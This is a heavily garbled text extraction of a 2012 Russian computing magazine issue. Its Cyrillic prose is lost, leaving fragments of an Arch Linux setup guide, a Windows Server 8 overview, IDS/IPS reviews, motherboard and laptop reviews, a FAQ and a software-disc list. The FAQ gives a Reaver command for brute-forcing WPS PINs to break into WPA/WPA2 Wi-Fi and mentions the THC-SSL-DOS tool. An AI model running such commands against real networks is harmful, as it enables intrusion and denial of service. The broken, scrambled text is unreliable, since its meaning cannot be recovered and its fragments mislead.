sda3 /www (: ,
-);
sda4 /var (: 1 ).

8. :
# mkfs.ext4 /dev/sda{2,3,4}

devpts /dev/pts devpts defaults 0 0


shm /dev/shm tmpfs nodev,nosuid 0 0
/dev/sda1 swap swap defaults 0 0
/dev/sda2 / ext4 defaults 0 1
/dev/sda3 /www ext4 defaults,noexec,nodev 0 1
/dev/sda4 /var ext4 defaults,noexec,nodev 0 1
tmpfs /tmp tmpfs defaults,noexec,nodev 0 0

/www
,
- www, .
/var /tmp .
, ,
.

6.
- .
ArchLinux
( , ) sshfs. :
1. .
2. sshfs.
3. (,
nginx, PostgreSQL, SSH):

9. /mnt:
#
#
#
#

mount
mkdir
mount
mount

/dev/sda2 /mnt
/mnt/www /mnt/var
/dev/sda3 /mnt/www
/dev/sda4 /mnt/var

10. :
# mount /dev/sdb1 /media
# cd /mnt
# tar -xzf /media/root.tar.gz

11. :
# chroot /mnt
# grub-install /dev/sda1

12. :
title
root
kernel
initrd

Arch Linux
(hd0,1)
/boot/vmlinuz30 root=/dev/sda6 ro
/boot/kernel30.img

02
02 /157/
/157/ 2012
2012

# pacman -Sy
# pacman -S nginx postgresql ssh

4. , , , nginx, PostgreSQL SSH, :


# pacman -Ql nginx postgresql ssh

5. sshfs:
# sshfs /mnt
# for file in `pacman -Ql nginx | cut -d ' ' -f 2`; do\
cp $file /mnt/$file;\
done

! ,
, ,
.

7.
,
. , .
: , . z
121
0121

SYN/ACK
SYN/ACK

grinder
grinder (grinder@synack.ru)

INFO

WWW


Win8


2012 .

2013-.


Windows Server
msdn.microsoft.
com/en-us/windowsserver.

Windows
Server 8


.
Win2k8 Server
Core

MS SQL Server
Exchange.

, Win8

.
Hyper-V
Replica

VIDEO



,

Windows 8
Developer Preview.

WARNING
Win8

64-
.


WINDOWS SERVER 8
,
2009 ,
Win2k8,
.
,
,
,
.
Developer Preview,
.
122
0122

Win8 Server Manager

02
02 /157/
/157/ 2012
2012

GUI, , PowerShell

.
, ( )
. ,
. ,
, .
Win8
: , ,
.

WINDOWS 8
Win2k8 Server Core ,
GUI (
VM) .
:
GUI , .
Win8 : GUI
. GUI , (Features
On Demand) GUI IE
Server Manager MMC.
.
Win8 ,
, .

Win2k8 PowerShell, ,
.
Win8 PowerShell, ,
, . 2300 ( PS1
130, PS2 230). IntelliSense
PS
. ,
. ,
API. - PS

02
02 /157/
/157/ 2012
2012

REST JSON. ,
Win8 RSAT Server Manager PS, PS.

.
WMI (Windows Management
Instrumentation) Win8 ,
SMI-S, WSMAN DCOM. ,
WMI-.
Win2k8 . ,
R2 . Win8
.
, Dashboard
, . , :
Computer Management PowerShell.
,
, .
Server Manager Metro,
wide-. ,
,
. , .
, .
: / RDS.
() VDI.
Notification.

HYPER-V

Hyper-V 3.0,
. 160
CPU ( ) 2 ,
VM 32 vCPU 512 .
CPU
, VM, . , Win8,
63 4000 VM, Live Migration,
Multi-Channel SMB ( -

ADAC

123
0123

SYN\ACK
SYN/ACK


).
, ,
Win2k8,
. ,
NUMA (Non-Uniform Memory Access) VM.
, Hyper-V . WHEA (Windows Hardware Error Architecture)
VM , .
, , VM
, /,
.
Hyper-V Replica
.
.
VHDX
, .
2 ( 16 ),
.
VM. BitLocker,
.


Win8 , . NIC teaming
32 ( ) (link aggregation),
,
.
. Control Panel

( ), Win8 IP- IPAM (IP Address
Management). , IP- ( ),
.
IP-.

124
0124

grinder (grinder@synack.ru)

DYNAMIC ACCESS CONTROL


DAC ,


- .

VM, .
SMB 2.2 Multi-Channel
SMB,

.
SMB
.
,
. , , Fibre Channel VM SMB.
(, ) ,
.
BranchCache .
, ,
,
. ,
.
DHCP Guard, DHCP- ,
DHCP.
DHCP failover. DNSSEC
DNS-, ,
DNS Spoofing.

(Direct Access VPN)
Unified Remote Access. Direct Access (
, ][_09_2011)
. DMZ,

02
02 /157/
/157/ 2012
2012

.
ACL
.
,
.
,
.
AD
.
ACL ,
. ACL . , ,
, VPN.
.
.
.

ACTIVE DIRECTORY

NAT'.
, .
Remote Desktop
Service. TCP UDP 10 % . RemoteFX,
Win2k8R2SP1,
RDP- , DirectX.
Win8 RemoteFX, GPU. ,
VDI . ,
, . , ,
.
NFS .
,
*nix-.


,
, .
storage pools, ,
VDI, storage spaces .

storage pool. , SATA- SAS-.
.
CHKDSK ,
. Win8 CheckDisk
- . .
,
, , . , Win8,
,

02
02 /157/
/157/ 2012
2012

, ,
Active Directory. ,
, .
Active Directory Domain Services Server Manager
, ,
DCPROMO.

/ Win2k3 Win8.
Win2k8R2 Active
Directory (Administrative Center, ADAC),
PowerShell. , ,
,
MMC. Win8 ADAC .
(, FGPP fine-grained password policies,
ADSI Edit). PowerShell,
. AD
.
VM , . ,

ID , ID
, Sysrep ,
.

IIS
- IIS 8.0 Windows Azure,
.
IIS CPU. ,
.
IIS WebSockets
- TCP.
, , HTML5.
SSL-.
, .
PowerShell.

, , .
, , ,
. z
125
0125

SYN/ACK
SYN/ACK

grinder (grinder@tux.in.ua)

IT-
IDS/
IPS

,
,

.
IDS/IPS,
,
.

INFO
Mod_Security GreenSQL-FW

,
][_12_2010.
iptables

,

, ][_12_2010.

WWW
hlbr.sf.net IPS
Hogwash Light BR.
cipherdyne.org/
fwsnort
Fwsnort.

IDS/IPS
IDS IPS,
. , IDS (Intrusion Detection
System) , .
, IDS , , , . . ,
(IP, ), IDS
( OSI),
. . APIDS (Application protocolbased IDS),
. PHPIDS (phpids.org), -

126

PHPIDS PHP-

02 /157/ 2012

IT-

PHP-, Mod_Security,
- (Apache), GreenSQL-FW, SQL (. ][_12_2010).
NIDS (Network Intrusion Detection System) , DPI (Deep Packet
Inspection, ).
, , .
. OpenDPI (www.opendpi.org) Fwsnort
(cipherdyne.org/fwsnort).
Snort
iptables.
, DPI ,
. IDS
(alert) .
,
. ,
. IPS (Intrusion
Prevention System, ).
IDS
, TCP RST.
, IPS
(SPAN), . , Hogwash Light BR (hlbr.
sf.net), OSI.
IP-, , .
, , ,
. IT
IPS (.
][_08_2009),
, . , . HIPS, , , ,
.
: , ,
.
, , . IDS,
(
SIM Security Information Management).

Suricata Snort, Snorby

02 /157/ 2012

127

SYN\ACK
SYN/ACK
OpenSource- Prelude Hybrid IDS,
OpenSource IDS/IPS
(
,
Linux *BSD).

. IDS/IPS-.

SURICATA
: OISF (Open Information Security Foundation).
Web: www.openinfosecfoundation.org.
: .
: Linux, *BSD, Mac OS X, Solaris, Windows/Cygwin.
: GNU GPL.
- IDS/IPS 2010- .

. Suricata OISF,
, US
Department of Homeland Security.
1.1, 2011 .
GPLv2,
GPL- , .
,
. ,
1.0, 1.1 70%.
IDS , Snort,
/ , . Suricata
. ,
Snort (
24 CPU 128 ). '--enable-cuda'
GPU.
IPv6 ( Snort
'--enable-ipv6'),
: LibPcap, NFQueue, IPFRing, IPFW. ,
, , .
( Linux
IPS
netlink-queue libnfnetlink).

IBM - GTOC X-Force

128


,
.

, : , IDS/
IPS, , -, . UTM (Unified
Threat Management, ).
UTM Trend Micro Deep Security (ru.
trendmicro.com), Kerio Control (kerio.ru), Sonicwall Network Security (sonicwall.com), FortiGate Network Security Platforms and
Appliances (fortinet.com)
Linux, Untangle Gateway, IPCop Firewall, pfSense (
, ][_01_2010).

(IP, TCP, UDP, ICMP, HTTP, TLS, FTP, SMB, SMTP


SCTP),
( Snort),
. Ivan Ristic, Mod_security, HTP, Suricata HTTP.
.
,
. , -,
, Snort (Barnyard,
Snortsnarf, Sguil . .), Suricata.
. HTTP
Apache.
Suricata (rules). ,
, :
Sourcefire VRT ( Oinkmaster), OpenSource
Emerging Threats (hemergingthreats.net) Emerging Threats Pro
(emergingthreatspro.com).
,
, . rules, .
: (pass, drop, reject alert),
(IP/ ) ( ). ( flowint),
, , . .
,
, , Snort , .
IP Reputation ( SensorBase Cisco, .
Cisco ][_07_2011).
, , Suricata ,

SURICATA
, SNORT,


-
02 /157/ 2012

IT-

Samhain ,

Snort, -
.
, .
,

. Smooth-sec (bailey.st/
blog/smooth-sec), Suricata.

SAMHAIN
: Samhain Labs.
Web: www.la-samhna.de/samhain.
: .
: Unix, Linux, Windows/Cygwin.
: GNU GPL
OpenSource- Samhain
IDS, . ,
, :

;
;
/ ;
;
SUID .

02 /157/ 2012

( ),
. Samhain
, ,
.
(TCP, AES, )
(yule),
(MySQL, PostgreSQL, Oracle). , ,
.
: e-mail ( ), syslog, - (),
Nagios, .
.
Linux, , Samhain
Windows.

STONEGATE INTRUSION PREVENTION SYSTEM


: StoneSoft Corporation.
Web: www.stonesoft.com.
: -, VMware.
: 32/64- Windows 2k3/Vista/7/2k8R2, Linux (CentOS,
RHEL, SLES).
: .

129

SYN\ACK
SYN/ACK
,
.
: IPS, DDoS- 0day-, -,
. . StoneGate
IPS , spyware, (P2P, IM ). -
,
.
AET (Advanced Evasion Techniques).
Transparent Access Control

. , .
-.

IPS. StoneGate IPS
, SIM/SIEM-, .

StoneSoft StoneGate Firewall/VPN StoneGate SSL VPN.
(StoneGate Management Center), :

Management Server, Log Server Management Client.


IPS
, . Java,
Windows Linux.
StoneGate IPS , VMware.

. , , -
.

IBM SECURITY NETWORK INTRUSION


PREVENTION SYSTEM
: IBM.
Web: www.ibm.com/ru.
: -, VMware.
: .
, IBM, ,
0day-.
IBM Security,
PAM (Protocol Analysis Module),
-

Suricata , Snort

130

02 /157/ 2012

IT-

(Proventia OpenSignature) .
PAM 218
( VoIP, RPC, HTTP . .) ,
DOC, XLS, PDF, ANI, JPG, ,
. 3000 , 200 DoS.

IP,
. Virtual
Patch
, .
.
P2P, IM, ActiveX-,
VPN . . . DLP, ,
.
( , ),
.
-, IBM
Web Application Security,
: SQL injection, LDAP injection,
XSS, JSON hijacking, PHP file-includers, CSRF . .
, ,
( , tcpdump), , .
, IP- VLAN. High
Availability ,
IPS, ,
, .
RAID, ,
. ,
-, (
).
IBM Security SiteProtector, ,
.

IDS/IPS?
IDS/IPS,
:

(
, )
.
.
IPS
, IDS.
.
IPS
.
, IP
().
, .
IPS- ,
,
.

02 /157/ 2012

StoneGate IPS

MCAFEE NETWORK SECURITY PLATFORM 7


: McAfee Inc.
Web: www.mcafee.com.
: -.
: .
IntruShield IPS, McAfee,
IPS-. McAfee Network Security Platform 7 (NSP).
NIPS
,
,
, . McAfee Global Threat Intelligence,
,
, , IP- URL- . NSP
, 0day- DDoS,
.
IDS/IPS ,
. NSP
,
VM, VM . Reflex
Systems, VM
.
1100 ,
OSI. -
.
NIPS, McAfee IPS Host Intrusion
Prevention for Desktop,
, ,
,
, .

.
, ,
, , ,
.
, ,
OpenSource- Snort , , .
Suricata , , . z

131

FERRUM


SANDY BRIDGE


AMD A75

! ,
Intel
AMD
. , , ,

86-.

, , ,
, .
AMD Llano
AMD Dual Graphics,
,
CrossFireX. ,
,
86-, AMD Llano Intel
Sandy Bridge. ,
AMD A8/A6
.

132

ASUS F1A75-V PRO.



: ! , ,

.
?
, AMD
A8-3850 4000 .
.
4 2400
( , 2400 , )
7000 .
.
--
15 000 . ,
!

:
: AMD A8-3850, 2,9
: Scythe NINJA 3
: Corsair
CMGTX7 @2400 , 1x 4
SSD: Kingston SVP100ES2/64G,
64
: HIPER TYPE K1000,
1000
: Windows 7

02 /157/ 2012

NAS

ASROCK A75 PRO4


, . ASRock A75 Pro4.
!
, / BIOS. ,
.
, - .
105 SATA. ( BIOS), .
EZ OC
Mode . , , : BIOS ,
CPU 3300/3400/3500/3600 2000/2200/2500 .
- ! ---! BIOS 1.80
. , ,
ASRock A75 Pro4 . ,
.

3500
.

ASROCK A75
EXTREME6
, . ,
ASRock A75 Extreme6. , Extreme6
.
Intel
P67 Express. AMD. , ASRock
.
. ASRock A75
Extreme6 :
PCI Express x16. , CrossFireX 8 + 8 + 4.
ASRock A75 Extreme6 . :
. 112
112 29 = 3248 , 112 18,66=2089,92
. EZ OC Mode .

4000
.

AMD Llano . , AMD Llano



.


.
,
.
. ,

02 /157/ 2012

AMD Llano
.
GIGABYTE
, , AMD A8-3850,
3600 , Crysis 2.
, Crysis 2!

.
, Crysis 2
1920 x 1080 -

, DirectX 9. 25 FPS.
. 3DMark Vantage
performance. ,



, . .

133

FERRUM

ASUS F1A75-I DELUXE


ASUS. F1A75-I Deluxe Mini-ITX PCI
Express x16. - .
. Deluxe
Wi-Fi Bluetooth.
, ASUS F1A75-I Deluxe ,
HTPC . :
.
UEFI BIOS .
- 118 . 118 29 = 3422 ,
118 18,66 = 2201,88 .
. ,
. , PCI Express x16. , ,
, , Scythe Big Shuriken, , , .

n/a

ASUS F1A75-V PRO


ASUS F1A75-V PRO
.

AMD Llano. , ,
!
140 .
140 29 = 4060 , 140
18,66=2612,4 . , , .
.

. , 25 FPS Crysis 2 !
, .
, AMD Llano , PCI Express x16,
16 + 4.
PCI Express x1 PCI.
SATA- USB- ASUS F1A75-V PRO
.

4000
.

ASRock A75 Pro4

ASUS F1A75-I
Deluxe

ASRock A75 Extreme6

FM1
10662400
1x PCI Express x16, 1x PCI Express x4, 2x
PCI Express x1, 3x PCI
5x SATA 3.0
7.1 CH HD Realtek ALC892
Realtek RTL8111E, 10/100/1000 /

FM1
10662400
1x PCI Express x16, 1x PCI Express x8, 1x PCI
Express x4, 1x PCI Express x1, 3x PCI
8x SATA 3.0
7.1 CH HD Realtek ALC892
Realtek RTL8111E, 10/100/1000 /

1x D-Sub, 1x DVI, 1x HDMI, 4x USB 3.0, 2x


USB 2.0, 1x eSATA, 1x FireWire, 1x S/PDIF,
1x RJ-45, 1x PS/2, 5x audio

1x D-Sub, 1x DVI, 1x HDMI, 4x USB 3.0, 2x USB 2.0, 1x DisplayPort, 1x DVI, 1x HDMI, 2x USB 3.0, 4x
1x eSATA, 1x FireWire, 1x S/PDIF, 1x RJ-45, 1x
USB 2.0, 1x eSATA, 1x FireWire, 1x S/PDIF, 1x RJPS/2, 6x audio
45, 1x PS/2, 1x Bluetooth, 3x audio

ATX

ATX

:
:
:
:
:
:

134

FM1
10661866
1x PCI Express x16
5x SATA 3.0
7.1 CH HD Realtek ALC892
Realtek RTL8111E, 10/100/1000 /; Wi-Fi
802.11 b/g/n

Mini-ITX

02 /157/ 2012

NAS

GIGABYTE GA-A75M-D2H
GIGABYTE GA-A75M-D2H.
,
mATX. -
DIMM . , .

.
CPU. GIGABYTE GA-A75M-D2H
SATA-.
. .
, BIOS Award.
, M.I.T.
! , , ,
GIGABYTE GA-A75M-D2H BIOS
.
CPU.
128 128 28 = 3584 ,
128 18,66 = 2388,5 .
134 .

3000
.

MSI A75MA-G55
,
MSI. MSI
A75MA-G55 , , , Military Class
II. ,
.
. MSI A75MA-G55 .
. BIOS MSI A75MA-G55, , . .
, 128 .
, ,
. ,
. , 115
. 115 29 = 3335
, 115 18,66 = 2145,9 .

3000
.


ASUS F1A75-V
PRO

GIGABYTE GAA75M-D2H

MSI A75MA-G55

FM1
10662250
1x PCI Express x16, 1x PCI Express x4,
2x PCI Express x1, 3x PCI
7x SATA 3.0
7.1 CH HD Realtek ALC892
Realtek RTL8111E, 10/100/1000 /

FM1
10662400
1x PCI Express x16, 1x PCI Express x4,
1x PCI Express x1, 1x PCI
6x SATA 3.0
7.1 CH HD Realtek ALC889
Realtek RTL8111E, 10/100/1000 /

FM1
10661600
1x PCI Express x16, 1x PCI Express x4, 1x
PCI Express x1, 1x PCI
6x SATA 3.0
7.1 CH HD Realtek ALC887
Realtek RTL8111E, 10/100/1000 /

1x D-Sub, 1x DisplayPort, 1x DVI,


1x HDMI, 4x USB 3.0, 2x USB 2.0, 1x
eSATA, 1x FireWire, 1x S/PDIF, 1x RJ45, 1x PS/2, 6x audio
ATX

1x D-Sub, 1x DVI, 1x HDMI, 2x USB 3.0,


4x USB 2.0, 1x S/PDIF, 1x RJ-45, 1x
PS/2, 3x audio

1x D-Sub, 1x DVI, 1x HDMI, 2x USB 3.0, 4x


USB 2.0, 1x RJ-45, 1x PS/2, 6x audio

mATX

mATX

02 /157/ 2012

: ,
, , .
,
, -
BIOS, .
.


ASUS F1A75-V PRO. GIGABYTE GA-A75M-D2H

.
GIGABYTE GA-A75-UD4H
. z

135

FERRUM

40 000
.

:
: 17.3", 19201080
: Intel Core i5-2410M, 2.4
: DDR3-1333, 6
: AMD Radeon 6650M, 2
: 500
: Gigabit LAN,
Wi-Fi , Bluetooth 3.0
: 3D-
: Windows 7 64
: 415.8276.1x32.3 37.9
: 2.9

:
WinRAR: 2369 /
Super Pi (16M): 330
PCMark05: 8788
3DMark Vantage: 4431
Resident Evil 5: 59 FPS
Call of Juarez: 21.5 FPS
Alien VS Predator: 13 FPS
Heaven Dragon: 12 FPS
Battery Eater: 67

SAMSUNG RF712-S01
!

.
. ,
. .
- . , Samsung RF712
, , 3D!


,
,

.
, -,
. ,
WinRAR,
Super Pi.
Futuremark: PCMark'05 3DMark Vantage.
Resident Evil 5,
Call of Juarez, Alien Vs. Predator Heaven.

136

12801024 .

Battery Eater .

.
Intel Core i5-2410M
AMD Radeon 6650M.

Samsung RF712
, . , .
.
. ,

. ,
3D- ,
,
. , 3D .
, Samsung RF712 . : Wi-FI 801.11n, Blu-Ray, USB 3.0 Bluetooth
3.0.
. Samsung
RF712 , ,

Samsung, RF712 .
,
. , USB-
,
. . ,

,
Samsung RF712
.

Samsung RF712
. ,
. , ,

. ,
! z

02 /157/ 2012

>> coding

!
shop.glc.ru



40%

8-800-200-3-999
+7 (495) 663-82-77 ()

6 1110 .
13 1999 .

6 1110 .
13 1999 .

6 564 .
13 1105 .

6 1110 .
13 1999 .

6 810 .
13 1499 .

6 1110 .
13 1999 .

6 630 .
13 1140 .

6 895 .
13 1699 .

6 1194 .
13 2149 .

6 894 .
13 1699 .

6 775 .
13 1399 .

6 950 .
13 1699 .

6 810 .
13 1499 .



AUDI A7

NEED FOR SPEED: THE RUN







"./# .1



350.589



;8IEB?8G
4@4EB



.EEDFOR3PEED4HE2UN
.E

4OYOTA#AMRY

6 690 .
13 1249 .

UNITS / FAQ UNITED

(twtitter.com/stepah)

FAQ United

FAQ@REAL.XAKEP.RU

,

SSL (,
#11/11
), SSL-.
THC-SSL-DOS (WWW.THC.
ORG/THC-SSL-DOS)
. ?
THC !

DDoS SSL-
A . : SSL- 15
, . , THC-SSL-DOS (www.thc.org/thc-ssl-dos)
,
.
TCP-, SSL
handshakes . ,
,
DDoS ,

(client-initiated renegotiations).
sslyze (code.
google.com/p/sslyze):
python sslyze.py --reneg www.server.com:443

client-initiated
renegotiations Honored, ,
. ,
SSL ( 2003 ).

, ,

Secure Renegotiation, , . sslyze
SSL:
,
(SSLv2, SSLv3 TLSv1)
.
-,

(
,

. .). :

2,5-
( )

3,5-
?


2,5", 3,5-
,
.
2,5" ,
, SAS (Serial
Attached SCSI) .
2,5- SATA-
, HDD Western Digital
VelociRaptor,
3,5-

2,5- ,
. .
,

, ,

- . ,
. -
3,5- ,

.

,
WINDOWS.
,
.

LINUX OS X,
?

UNIX-
:

/var/at/tabs/<username>
/etc/ttys
/etc/profile
/etc/bashrc
/etc/csh.cshrc
/etc/csh.login

5 : DROPBOX
Dropbox . ?
,

(
Dropbox),
99,9 % (
Amazon S3) , ?

138

, ,
.
(HTML, CSS, JavaScript)
Public, public-
(, index.html) :
http://dl.dropbox.com/u/21310/site/index.html.

, ,

index.html. . Dropbox ,
, . !

bit.ly .

02 /157/ 2012

FAQ UNITED

/etc/rc.common
~/.profile
~/.bashrc

OS X :

WI-FI-,
WPA/WPA2?
,


.

( ),
. WPS
-,
WPS PIN,
, , ,
WPA/WPA2, , , !
,
. .
Reaver (bit.
ly/uAaS67),
WPS. :
BBSID (
MAC-) (
), :

/System/Library/LaunchDaemons
/System/Library/Extensions
/Library/LaunchDaemons
/System/Library/LaunchAgents
/Library/LaunchAgents
/Library/StartupItems
/Library/Preferences/loginwindow.plist
~/Library/LaunchAgents
~/Library/Preference/loginitems.plist
~/Library/Preference/loginwindows.plist

,

, , . ,
WPA/
WPA2 ,
,
, ,
WPS. ,
Wi-Fi Protected Setup ,


WPA2. ,


,
,
.
PIN-.
,

, , ,
user mode.

:
/System/Library/Caches/com.apple.kernelcaches
/System/Library/Filesystems/AppleShare/
/System/Library/Filesystems/hfs.fs/Encodings/


EFI (
Mac', Intel).

SSD .
,
.
, WINDOWS 7
SSD,
- . ,

.
, SSD
?

,

. Windows 7

,
(, Superfetch
Application launch prefetching).
,

reaver -i mon0 -b 00:01:02:03:04:05


, ,
.
,
WPS ,
!
: bit.
ly/uAaS67. reaver,
PoC (bit.ly/u3mTXF), ,

Wi-Fi-.

,
,
CMS droppages.com.
(, demo.
droppages.com.zip),
your_site.droppages.com.
.

02 /157/ 2012

WPS PIN. ,
, WPA2!

:
Content (
), Public ( )
Templates (HTML-,
).
(
Content)
.


server1@
droppages.com.
HTML.
.

139

UNITS / FAQ UNITED


,
EnableSuperfetch
EnablePrefetcher
HKEY_LOCAL_MACHINE\SYSTEM\
CurrentControlSet\Control\Session Manager\
Memory Management\PrefetchParameters. swap-. HKEY_
LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Control\Memory Management\:
ClearPageFileAtShutdown 0.
, ,
TRIM,
, .
:
fsutil behavior query DisableDeleteNotify

DisableDeleteNotify,
, TRIM .
. , TRIM ( RAID MSAHCI).
PYTHON

WINDOWS-?

Python'
.
pywinauto (code.google.com/p/
pywinauto), GUI-.

:

from pywinauto import application


app = application.Application.
start("notepad.exe")
app.Notepad.MenuSelect(
"Help->About Notepad")
app.AboutNotepad.OK.Click()
app.Notepad.Edit.TypeKeys (
"pywinauto Works!", with_spaces=True)


(pywinauto.googlecode.com/hg/pywinauto/docs/
index.html). :
1. .
2. python.exe setup.py install.
3. PIL (www.pythonware.com/
products/pil/index.htm).
4. elementtree (effbot.org/
downloads).


,
-

,
- . ?


ZoomIt (bit.ly/uULr0d) .
.
,
- .


LINUX,
- SSH?

,

SSH- ,
.

.
,
-
( 22). iptables. :

iptables -P INPUT DROP


iptables -A INPUT -m state \
--state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp -m tcp \
--dport 22 -m state --state NEW \
-m recent --set --name SSH
iptables -A INPUT -p tcp -m tcp \
--dport 22 -m state --state NEW \
-m recent --update --seconds 60 \
--hitcount 4 --rttl --name SSH -j DROP
iptables -A INPUT -p tcp -m tcp \
--dport 22 -m state --state NEW -j ACCEPT

,
, : IP
/proc/net/
ipt_recent/SSH.
( ,

GIT&&GITHUB: )

GIT.
,
COMMIT'
WINDOWS
VIM.
-
?

WPA2- WPS
PIN. !

GitPad (https://
github.com/github/gitpad).
,
,
.
, , Notepad++.
Git':

git config --global core.editor \


"'C:\\Program Files (x86)\\Notepad++\\
notepad++.exe' -multiInst -notabbar
-nosession -noPlugin"


,

.
?

,

open.dapper.net Yahoo.
:
1. URL-, . Dapper.net

.
2.
, , , .
, , variable 1
,
.
3. ,
, . , ,
,
,

. .
4. .

RSS
RSS- ( ,

RSS-), , ,
XML
.

, dapper.
net
. z
DDoS SSL-

140

02 /157/ 2012

12 2200 .
6 1260 .
,
!

.
: 210

GOOGLE CHROME 030

x 09 (152) 2011

LULZSEC
09 (152) 2011

082

LULZSEC / FOX NEWS

1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .

500 .



WINDOWS 7

PHPMYADMIN
064

ANDROID 070
152

,
JAVASCRIPT 050

:
, ,
FOX NEWS



+ + 2 DVD:
162
( 35% , )

!
,
.

12 3890 (24 )
6 2205 (12 )

.
,

? info@glc.ru 8(495)663-82-77 ( ) 8 (800) 200-3-999 (


, , ).

>Net
Comodo Unite 3.0.2.0
FtpUse 2.0
Image Picker 1.0.0
Insync 0.9.5
Joukuu Lite 1.3.3.3
KumoSync 1.1.1
Mikogo 4.0
MultiMi 0.9.29
Remote Desktop Manager
Remote Potato 1.0.6
The E-Mail Client 1.03

>Multimedia
Antenna 1.5.0
Artweaver Free 3.0.1
Avidemux 2.5.5
CamStudio 2.0
GreenForce-Player 1.11
Jing
Moo0 AudioTypeConverter 1.24
Nepflex Screen Recorder 1.4.0.4
PhotoLikr 1.2
Screenpresso 1.3.0
Sublight 3.0.0
Trout 1.0.6
UMPlayer 0.98
VideoSpin 2.0
VirtualDub 1.10.1
YACReader 0.4.0

>Misc
7Files 0.3
8Start 3.0
bcWebCam 2.1.0.3
Cathy 2.28.3
Clipboard Saver
Coolbarz 0.1.6.7
Dictation Pro 0.91
Executor 0.99.11
FocusWriter 1.3.5.1
gBurner Virtual Drive 3.1
Gizmo Toolbar 2.5.0
NppDocShare 0.1
Soda 3D PDF Reader
Tiles 0.98
WindowSlider 0.3
XWidget 1.2.3

>>WINDOWS
>Development
Adventure Game Studio 3.2.1
Batch Compiler 1.0
BinScope Binary Analyzer 0.0.1
dotPeek 1.0
Expert Debugger 3.2
FMOD Ex 4.38.05
JoeBlogs 1.0
MiniFuzz 1.5.5.0
NVIDIA Parallel Nsight 2.1
NVIDIA PerfKit 6.70
PeStudio 3.54
QuickPHP 1.14.0
QuickSharp 2.0
Resource .NET 3.0
SQL Prompt 5.2
XDebug 2.1.2

>Net
Adchpp 2.8.0
Ahcpd 0.53
Babel 1.3.0
Bitflu 1.39
Clawsmail 3.8.0
Deluge 1.3.3
Emesene 2.11.11
Getmail 4.24.0
Gnunet 0.9.0
Jitsi 1.0b1
Movgrab 1.1.5
Mulk 0.6.0
Opera 11.60
Pidgin 2.10.1
Quamachi 0.6.0
Quban 0.2.2
Surrogafier 1.9.1b
Xplico 0.7.0
>Security
Androguard 1.0-rc1
Android WebContentResolver
Angryip 3.0b6
Artillery 0.2 Alpha
Autopsy 3.0.0b2
Bokken 1.5
CSRFScanner 1.0
ELFkickers 3.0
Ettercap 0.7.4
Fwsnort 1.6.1
Gnutls 3.0.9
Keepass 2.17
ModSecurity 2.6.3-rc1
Opendnssec 1.3.4
Radare2 0.9
Stunnel 4.50

>>UNIX
>Desktop
Bluetile 0.6
Bombonodvd 1.2.0
Calibre 0.8.31
Cinepaint 1.0
Darktable 0.9.3
Dupeguru_me 6.2.0
Ffmpeg 0.9
Gnomesubtitles 1.2
Lives 1.4.9
Nightingale 1.8.1
Pdfmasher 0.6.3
Qtractor 0.5.2
Qx11grab 0.2.6
Razor-qt 0.4
Smillaenlarger 0.9.0

>>MAC
ArgoUML 0.34
CoRD 0.5.5
DesktopShelves 1.4.2
DiffMerge 3.3.2
dupeGuru ME 6.2.0
EasyFind 4.8.1
Folx 2.0.1028
keka 0.1.4.3
Lion Secrets 1.2.0
Mini vMac 3.2.3
Mixxx 1.9.2
ShareIt 1.0
Soundcloud Downloader 2.0
Task Coach 1.3.3
Time Out 1.6.3
Vox 0.3 beta 1
XnViewMP 0.39

>X-Distr
Linux Mint 12
Pfsense 2.0.1

>System
Bochs 2.5
Cemosshe 11.12.06
Debreate 0.7.7
Kmod 1
Linux 3.1.6
Nxlog 1.2.494
Pam_mount 2.13
Powertop 1.8
Qemu 1.0
Rpmerizor 2.6
Rtirq 20111007
Sali 2.4.11
Tpe-lkm
Xf86-video-ati 6.14.3
Zsh 4.3.14

>Server
Apache 2.2.21
Asterisk 10.0.0
Bind 9.8.1-p1
Cups 1.5.0
Dhcp 4.2.3-p1
Dovecot 2.0.16
Freeradius 2.1.12
Lighttpd 1.4.30
Mysql 5.5.19
Nsd 3.2.9
Openldap 2.4.28
Openvpn 2.2.2
Postfix 2.8.7
Postgresql 9.1.2
Pure-ftpd 1.0.35
Samba 3.6.1
Sendmail 8.14.5
Snort 2.9.2
Sqlite 3.7.9
Squid 3.1.18
Syslog-ng 3.3.3
Vsftpd 2.3.5

>Devel
Bluefish 2.2.0
Buildbot 0.8.5
Codelite 3.0.0.5041
Eigen 3.0.4
Eric 5.1.7
Fastutil 6.4.2
Getid3 1.9.2
Gral 0.8
Ideaic 11
Lazarus 0.9.30.2
Libqrencode 3.2.0
Libutillery 1.7.0
Llvm 3.0
Odbcpp 1.6
Pantheios 1.0.1b213
Sourcesquare 23122011
Tcpdf 5.9.141
Text-tokenizer 0.4.5
Ultimatepp 4193
>Games
Eternallands 1.9.2
Gigalomania 0.21
Pioneer alpha17

The Mole 0.2.6


XSSer v1.6b
XssScanner 1.1

Sweethome3d 3.3
Synfig 0.63.03
Veusz 1.14

>System
AllOff 3.4
BlueStacks
Clipboardic 1.10
D7 4.9.6
DiskAlarm 1.2.4370
DisplayFusion 3.4.0
Gow 0.5.0
iCare Data Recovery Professional
iPadian
OSFMount 1.5.1008
Patch My PC 2.0.6.3
RMPrepUSB 2.1.630
SaBackup 0.9.3.3
Track Folder Changes 1.1
Win7AudioSwitcher
WinArchiver Virtual Drive 2.7

>Security
Activity Monitor 1.05
Artillery 0.2
Autopsy 3.0.0b2
Cain & Abel 4.9.43
Comodo Cleaning Essentials 1.6
Echo Mirage 1.2
Ettercap 0.7.4
Heimdal
Identity Finder
Immunity Debugger 1.84
IOCTL Fuzzer 1.3
MysqlPasswordAuditor 1.0
Net2SharePwn 1.0b
NTO SQL Invader
oSpy 1.10.4
Radare2 0.9
RainbowCrack 1.5
Scrapy 0.14
SSLyze 0.3
The Mole 0.2.6
Toolwiz Care 1.0
Wavsep 1.1.0
WeBaCoo 0.2
WinAPIOverride32 5.5.3
XSSer v1.6b

Tixati 1.74
WebReader 0.8.80 beta
WLAN Optimizer 0.21
Yoono desktop 1.8.16

02(157) 2012

 


8889",&136



.0/(0%#

l_`_b_ta#(2/-%
,

(00(-&

 
(00(-&$)30.&



  



gpqmog~
orqigqma
 



`dpdcrdkm$$/3
ppmfc_qdj~kg
()'(,/!$,!"



f_nrpi_dk
!.$2/)$l_
m`zvlmkimknd





odimkdlcma_ll_~

WWW2
Z-MUSIC
